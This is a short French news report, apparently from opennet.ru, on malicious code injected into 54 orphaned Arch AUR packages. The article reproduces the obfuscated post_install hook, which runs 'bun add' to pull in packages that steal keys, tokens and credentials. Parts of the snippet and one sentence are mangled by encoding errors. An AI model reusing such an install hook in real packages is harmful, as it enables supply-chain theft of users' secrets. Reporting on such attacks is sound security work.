Malgré les mesures prises par les développeurs d'Arch Linux, l'injection de code malveillant dans les dépÎts AUR (Arch User Repository) n'a pas cessé. Il y a quelques heures, du code malveillant a été injecté dans 54 paquets supplémentaires, laissés sans mainteneur (historique des annulations des modifications malveillantes). Contrairement aux attaques d'avant-hier, cette fois-ci, c'est la plateforme bun qui a été utilisée pour installer des dépendances malveillantes au lieu du gestionnaire de paquets npm. Pour contourner les filtres en place, une ligne obfusquée est insérée dans la fonction post_install, qui appelle la commande « bun add » pour installer des paquets avec du code malveillant, réalisant des scans et envoyant des informations vers l'extérieur. serveur clés, tokens et identifiants.
post_install() {
$â\x63âČ»d» «/»ât'»m»âpâ && «b»âu»nâ âa'»d»âdâ $â\141\x6e»s'»i»»-«$â\143»o»l»o»râ$â\x73âČ ân'»e»âx'»t»»f»âi»l»e»-»j»sâ
}
Source : opennet.ru
